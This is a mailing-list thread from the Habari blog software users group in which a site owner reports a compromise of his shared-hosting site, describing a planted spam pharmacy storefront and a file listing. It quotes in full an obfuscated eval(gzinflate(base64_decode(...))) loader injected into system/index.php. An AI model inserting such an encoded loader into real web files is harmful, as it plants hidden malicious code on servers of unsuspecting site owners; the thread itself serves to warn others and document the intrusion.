Also, in my system/index.php, the following appears...

// We start up output buffering in order to take advantage of output
compression,
// as well as the ability to dynamically change HTTP headers after
output has started.
ob_start();
eval (gzinflate(base64_decode(
'RY6xDoIwFEV3Ev6hG7L0qS1oorEumpj4D82DPqQJpdhSvl8cjNM9yzm56nJWeXYN'
.'9E420KaA3jsC0wzpO7hYw83gkLfegUvRtjA7FBD9+IogaYlHEoShqkl0dYOyrQ77'
.'nZFbQXzqp4KVpzz7xZmxYUS3gtb3x/OmNSsZZwVgmv3g0fwVtd76AA==')));
spl_autoload_register( 'habari_autoload' );

I've got no idea how this happened.  Nobody else has my password, and
it's not a dictionary word, reused password or common password.

--David

On Oct 9, 4:24 pm, David <david.bl...@gmail.com> wrote:
> This may not have anything to do with any weakness in Habari.  But it
> did happen in the domain where I maintain my Habari installation.
> (And I'm sending this email prematurely, I'm sure.)
>
> My webserver is on an shared server at Dreamhost. I'm running Habari
> 0.7.1.
>
> I have the domainhttp://david.dlma.comredirect tohttp://david.dlma.com/habari
> in a plaintext php file.  Then today, I noticed that my simple
> redirect turned into an eval( (gzinflate(base64_decode( ... ) ) )
> string some days ago.
>
> It looked like the contents of this 
> file:http://david.dlma.com/index.php_with_weird_eval_statement.txt, except
> I replaced the eval with an echo statement.
>
> Following the clues, I've got a subdirectory filled with a storefront
> that sells cialis with malign php code all around.
>
> $ ls -al
> total 124
> drwxr-xr-x 2 user pg844184 4096 2011-10-09 15:59 .
> drwxr-xr-x 6 user pg844184 4096 2009-08-08 02:14 ..
> -rw-r--r-- 1 user pg844184 8609 2011-09-27 21:19
> 345e2d4c5075dc599ad78c29682042f0
> -rw-r--r-- 1 user pg844184 8119 2011-09-27 21:19
> 3ec3771ca32c4a6a5e040a4741016233
> -rw-r--r-- 1 user pg844184 4456 2011-09-27 11:20
> 4evs8e3ear56e3f6ba4c5721d403e.php
> ... (some more, without the .php extension) ...
> -rw-r--r-- 1 user pg844184  104 2009-08-08 02:14 index.php
>
> It's probably just me, but you may want to check for eval calls where
> you didn't expect them.
>
> Luckily (or not), the storefront installed on my system was put into a
> subdirectory that I protected with a .htaccess authentication.  So I
> don't think anybody saw the fake drugstore anyway.
>
> Sorry if this actually had nothing to do with Habari.  I don't know
> enough about intrusions like this to be sure.  I'm off to delete
> obviously infected files.

-- 
To post to this group, send email to habari-users@googlegroups.com
To unsubscribe from this group, send email to 
habari-users-unsubscr...@googlegroups.com
For more options, visit this group at 
http://groups.google.com/group/habari-users

Reply via email to